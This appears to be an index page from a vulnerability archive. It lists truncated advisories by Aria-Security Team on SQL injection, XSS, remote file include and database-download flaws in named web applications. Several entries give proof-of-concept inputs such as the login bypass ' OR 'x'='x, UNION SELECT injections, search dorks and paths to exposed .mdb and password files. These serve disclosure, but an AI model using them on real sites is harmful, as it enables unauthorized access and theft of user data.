I-RATER Platinum Config_settings.TPL.PHP Remote File Include Vulnerability

No description provided by source. source: http://www.securityfocus.com/bid/17731/info I-RATER Platinum is prone to a remote file-include vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input. An attacker can exploit this issue to include an...

Wheatblog <= 1.1 (session.php) Remote File Include Vulnerability

No description provided by source. Aria-Security.net Advisory Discovered by: O.U.T.L.A.W www.Aria-security.net Gr33t to: A.u.r.a & l2odon & DrtRp & Sh3ll ?php includeonce$wbclassdir/classDatabase.php; function StartSession global $sessiondir; if $sessiondir != '' sessionsavepath$sessiondir; if !...

Active Auction House Cross Site Scripting

--------------------------------------------------------- Portal Name: Active Auction House Vendor : http://www.activewebsoftwares.com/P24ActiveAuctionHouse.aspx?Tabopen=1 Author : PouyaServer , [email protected] Aria-Security.Net Vulnerability : CM...

LinksPro SQL Injection

--------------------------------------------------------- Portal Name: LinksPro Standard Edition Vendor : http://www.codefixer.com/applinkspro/standard.asp Author : PouyaServer , [email protected] Aria-Security.Net Vulnerability : SQL ---------------------------------------------------------...

DMXReady Blog Manager XSS / SQL Injection

--------------------------------------------------------- Portal Name: DMXReady Blog Manager SQL/XSS Vendor : http://www.galaxyscripts.com Author : PouyaServer , [email protected] Aria-Security.Net Vulnerability : SQL/XSS --------------------------------------------------------- SQL:...

FaScript FaUpload - SQL Injection

FaScript FaUpload - SQL Injection !!..:: ZAC003 ::..!! -+ Vive int Iranian WhiteHat Nomads Group +- ------------------------------------------------------------------------------------------- Reporter : ZAC003 From Aria-Security.Net Script Download :...

PHP-Nuke My_eGallery &quot;gid&quot; Remote SQL Injection

Aria-Security Team http://Aria-Security.Net ----------------------------- Shoutz: Aura, Null, imm02tal, Kinglet, and our staff PHP-Nuke MyeGallery "gid" Remote SQL Injection Dork: inurl:"modules.php?name=MyeGallery"...

Joomla com_stat &quot;id&quot; Remote SQL Injection

Aria-Security Team Persian Security Network http://Aria-Security.Net ------------------------------- Shoutz : The-0utl4w, Sc0rp!on, mormoroth, Kinglet, iM4N, Joomla comstat "id" Remote SQL Injection...

Pigyard Art Gallery Multiple SQL Injection

Aria-Security Team, http://Aria-Security.net ------------------------------- Shout Outs: AurA, imm02tal, iM4N, Kinglet, Vendor: Pigyard Art Gallery Multiple SQL Injection This is a completation of the original advisory reported by ZoRLu @ Milw0rm http://www.milw0rm.com/exploits/5181 Original Link...

joomlablog-sql.txt

Aria-Security Team Persian Security Network http://Aria-Security.Net ------------------------------- Shoutz : The-0utl4w, Sc0rp!on, T3rr0r1st, mormoroth, Kinglet Joomla Comblog "pid" Remote SQL Injection index.php?option=comblog&name=aria-Security.Net&task=view&pid=SQL INJECTION More info and gui...

aeries browser interface&#40;ABI&#41; 3.8.2.8 Remote SQL Injection

Discovered By : Arsalan Emamjomehkashan [email protected] aeries browser interfaceABI 3.8.2.8 Remote SQL Injection Website:http://aeries.com/ GradebookStuScores.asp?GrdBk=SQL -------------------------- Aria-Security Team httP://Aria-Security.Net...

NetAuctionHelp 4.1 - nsearch SQL Injection

NetAuctionHelp 4.1 - nsearch SQL Injection Aria-Security Net http://Aria-Security.Net ------------------------ Vendor: http://www.netauctionhelp.com PoC: search.asp ?sort=ni&category=&categoryname=&kwsearch=&nsearch=SQL INJECTION search.asp?sort=ni&category=&categoryname=&kwsearch=&nsearch='havin...

Aria-Security.Net: VU Mailer &#40;Mass Mail&#41; &quot;Password&quot; SQL Injection

Aria-Security Team, http://Aria-Security.net ------------------------------- Shout Outs: AurA, imm02tal Vendor: http://vunet.us Login Page Default.asp Password: anything' OR 'x'='x Regards, The-0utl4w Credits Goes To Aria-Security.Net...

[Aria-Security.Net] VU Case Manager &quot;Username/Password&quot; SQL Injection

Aria-Security Team, http://Aria-Security.net ------------------------------- Shout Outs: AurA, imm02tal Vendor: http://vunet.us Login Page Default.asp Password: anything' OR 'x'='x Regards, The-0utl4w Credits Goes To Aria-Security.Net...

mwf-ftp.txt

Aria-Security Team http://Aria-Security.Net shout out to: AurA, imm02tal and Aria's Staff http://site.com/path/mwftp/pass/pass.txt As you see the mentioned file contains the md5 which you can crack and use in http://site.com/path/ftp.php to login. Regards, The-0utl4w...

[Aria-Security.Net] CodeWidgets.Com Online Event Registration Multiple login SQL Injection

http://Aria-Security.Net ------------------------------------- CodeWidgets.Com Online Event Registration Poc Normal User account: login.asp Email address: ' UNION SELECT FROM users password: Aria-Security.Net Admin Panel: adminlogin.asp Email address: ' UNION SELECT FROM admin Password:...

dmcms-sql.txt

Aria-Security Team DMcms Sql Injection http://target.ltd/PATH/index.php?page=media&id=SQL INJECTION CODE GOES HERE Other files may have this vuln. also. Credits goes to Aria-Security Team http://Aria-Security.net The-0utl4w...

ios-mdb.txt

Discovered by:Aria-Security Team Type:Remote Password Disclosure Vendor:http://diggersolutions.com/blogs/diggersolutions/default.aspx PoC: http://victim.com/path/data/intranet.mdb Contact: [email protected] http://aria-security.com/forum/showthread.php?goto=newpost&t=88...

aspbb.txt

Discovered By: Aria-Security Team Vendor: http://www.aspbb.org/ Risk: Low Type:Remote Password Disclosure PoC: http://TARGET/PATH/db/aspbb.mdb Contact: [email protected]...

BattleBlog Database Download Vulnerability

Aria-Security Team Happy New Year!! Aria-Security.com For English Aria-Security.net For Parsi Discovered: Aria-Security Team Vendor:http://www.battleblog.com/home/g/ Risk: Low Type:Remote Database Download PoC: http://TARGET/path/database/blankmaster.mdb Contact: [email protected]...